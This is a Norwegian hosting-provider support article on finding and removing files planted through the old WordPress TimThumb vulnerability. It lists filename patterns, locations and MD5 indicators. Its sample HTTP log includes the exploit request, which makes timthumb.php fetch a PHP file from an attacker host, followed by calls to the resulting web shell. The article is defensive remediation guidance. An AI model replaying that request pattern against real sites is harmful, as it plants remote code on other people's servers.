Kompromittering av WordPress: TimThumb

TimThumb er et verktøy som brukes av WordPress-temaer og plugin-moduler til å endre størrelsen på bilder. Gamle versjoner av TimThumb har et sikkerhetsproblem som gjør det mulig for angripere å laste opp skadelige («ugyldige) filer fra et annet nettsted. Den første ugyldige filen gjør det så mulig for angriperen å laste opp flere skadelige filer til hostingkontoen.

Du finner mer informasjon om kompromitteringer og hvordan du skal håndtere dem i Hva om nettstedet mitt blir hacket?.

Tegn på at du har blitt kompromittert

I tillegg til tegnene nevnt i Hva om nettstedet mitt blir hacket?, vet du at nettstedet ditt har blitt rammet av denne spesifikke kompromitteringen hvis kontoen din inneholder filer med følgende mønstre i en plugin-modul-katalog:

  • external_[md5 hash].php – for eksempel: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php – for eksempel: 7eebe45bde5168488ac4010f0d65cea8.php

Du finner eksempler på mulige md5-hash-koder i delen MD5SUMS for kjente skadelige filer av denne artikkelen.

Det kan også hende at du finner følgende filer i rotkatalogen til nettstedet ditt (mer informasjon):

  • x.txt
  • logx.txt

Løsninger

Du må fjerne alle kompromitterte og ugyldige filer. Før du sletter noe, anbefaler vi deg å ta en sikkerhetskopi av nettstedet ditt (mer informasjon).

Finne ugyldige filer

De ugyldige filene som opprinnelig lastes opp via sikkerhetsproblemet i TimThumb, er vanligvis å finne i en av følgende kataloger, som befinner seg i katalogen /theme eller /plugin som inneholder den problematiske TimThumb-filen.

  • /tmp
  • /cache
  • /images

Eksempler på ugyldige filers plassering:

[webroot]/wp-content/themes/[tema med problematisk TimThumb]/cache/images/

Eksempler på ugyldige filers navn på disse plasseringene:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Filene x.txt og logx.txt vil inneholde informasjon om når en ugyldig fil ble opprettet via TimThumb-sikkerhetsproblemet samt den ugyldige filens plassering i hostingkontoen. Denne informasjonen er nyttig for å fastslå hvilke filer som må fjernes og hvor du kan finne dem. Det er imidlertid ikke sannsynlig at dette gir deg en fullstendig liste over filer som må fjernes.

Et eksempel:

Dag: Tor 11 apr 2013 06:21:15 -0700
IP: X.X.X.X
Nettleser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[tema med problematisk TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Filer som må fjernes

Når du har opprettet en sikkerhetskopi av nettstedet ditt, fjerner du følgende filer:

  • x.txt
  • logx.txt
  • external_[md5 hash].php – for eksempel: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php – for eksempel: 7eebe45bde5168488ac4010f0d65cea8.php
  • Andre skadelige PHP-filer som blir funnet med md5-hash-koden i filnavnet.

Du kan gjøre dette via FTP (mer informasjon) eller gjennom filbehandlingen på kontrollpanelet for hostingkontoen din (mer informasjon).

Du bør også:

  • Oppdatere alle temaene og plugin-modulene dine til den nyeste versjonen.
  • Erstatte alle forekomster av TimThumb.php med den nyeste versjonen som finnes her.

Teknisk informasjon

Eksempel på HTTP-logger

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[tema med problematisk TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[tema med problematisk TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[tema med problematisk TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[tema med problematisk TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5SUMS for kjente skadelige filer

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Ytterligere skadelige filer

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Var denne artikkelen nyttig?
Takk for din tilbakemelding. For å snakke med en representant fra kundeservice, bruker du telefonnummeret til støtte eller chatte-alternativet ovenfor.
Vi er glade for å kunne hjelpe deg! Er det noe annet vi kan gjøre for deg?
Vi beklager det. Fortell oss hva som var forvirrende eller hvorfor løsningen ikke løste ditt problem.